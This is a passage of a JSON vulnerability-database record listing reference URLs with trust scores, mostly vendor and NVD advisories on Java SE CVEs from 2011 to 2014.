"http://www-01.ibm.com/support/docview.wss?uid=swg21631304" }, { "trust": 0.6, "url": "https://www.redhat.com/security/data/cve/cve-2012-5072.html" }, { "trust": 0.6, "url": "https://www.redhat.com/security/data/cve/cve-2012-5089.html" }, { "trust": 0.6, "url": "https://www.redhat.com/security/data/cve/cve-2012-5068.html" }, { "trust": 0.6, "url": "https://www.redhat.com/security/data/cve/cve-2012-5071.html" }, { "trust": 0.6, "url": "https://www.redhat.com/security/data/cve/cve-2012-5069.html" }, { "trust": 0.6, "url": "https://www.redhat.com/security/data/cve/cve-2012-5075.html" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3143" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3159" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5083" }, { "trust": 0.5, "url": "https://access.redhat.com/knowledge/articles/11258" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2012-1531.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2012-5083.html" }, { "trust": 0.4, "url": "http://www.kb.cert.org/vuls/id/144389" }, { "trust": 0.4, "url": "http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2012-october/020556.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-1532.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-4820.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-4822.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-3159.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-0547.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-1533.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2012-3143.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.3, "url": "http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2012-october/020571.html" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-023/index.html" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_fixed_in_java" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_fixed_in_java1" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21621887" }, { "trust": 0.3, "url": "http://www-01.ibm.com/software/tivoli/products/directory-integrator/" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_rational_functional_tester_versions_8_x_due_to_security_vulnerabilities_in_ibm_jre_7_0_service_release_2_or_e" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633918" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100168011" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100168009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24035073" }, { "trust": 0.3, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03595351" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?docid=emr_na-c03909126-1" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04126444" }, { "trust": 0.3, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03596813" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21670968" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21621951" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21621771" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1io17899" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1io17937" }, { "trust": 0.3, "url": "http://q1labs.com/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21617321" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21617323" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631323" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635864" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637519" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21657767" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626504" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21625941" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21639736" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638108" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21639549" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21655075" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21636462" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21619418" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21639487" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21626697" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2013-0003.html" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2013-0006.html" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/cheu-at5u75" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21621959" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21621958" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-5085.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-5086.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-4416.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-5077.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-4823.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-1682.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4820" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4822" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1540.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1476.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0428.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1480.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2419.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0401.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0425.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1722.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0419.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2422.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1721.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0409.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0423.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0443.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0809.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1487.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0351.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0427.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0433.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1493.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1569.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2435.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1541.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1557.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2429.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1713.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3213.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0441.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1718.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0432.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0446.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1481.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1537.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1717.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2432.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0450.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1491.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2383.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2418.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1473.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1563.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2424.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2433.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1716.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3342.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0426.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0440.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1725.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2417.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0445.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2394.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2430.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0442.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0551.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0424.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1719.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1486.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2384.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0438.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1478.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0435.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0434.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2420.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2440.html" }, { "trust": 0.2, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5087" }, { "trust": 0.2, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4823" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://github.com/tomato42/marvin-toolkit" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1619-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "http://icedtea.classpath.org/hg/release/icedtea6-1.10/file/icedtea6-1.10.10/news" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0873.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3548.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3521" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3556.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3563.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3546" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3551.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0497.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0500.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3389.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3561.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0863.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0499.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0862" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0867.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0507.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3552.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0814.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3547.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3549" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0503.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3554.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3549.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3553" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3516.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0871.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3554" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0868.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3389" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0873" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3548" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3521.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3547" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3553.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3545" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0802.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0865.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3516" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3545.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0862.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3561" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3556" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3544.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0867" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0506.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0501.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0869" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3560.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3550" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3557.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0865" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0502.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0498.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3560" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3546.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3552" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3544" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0869.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0863" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3550.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-5035.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3557" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0505.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0871" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0868" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0814" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html" }, { "trust": 0.1, "url": "http://h18012.www1.hp.com/java/alpha" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-1485.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5075" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5086" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4416" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5089" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-3216" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5979" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5081" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5077" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5068" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5071" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5084" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5979" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5073" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5085" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5072" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5069" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3342" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3213" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5870" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5818" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5889" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0385" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2437" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3743" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.1, "url": 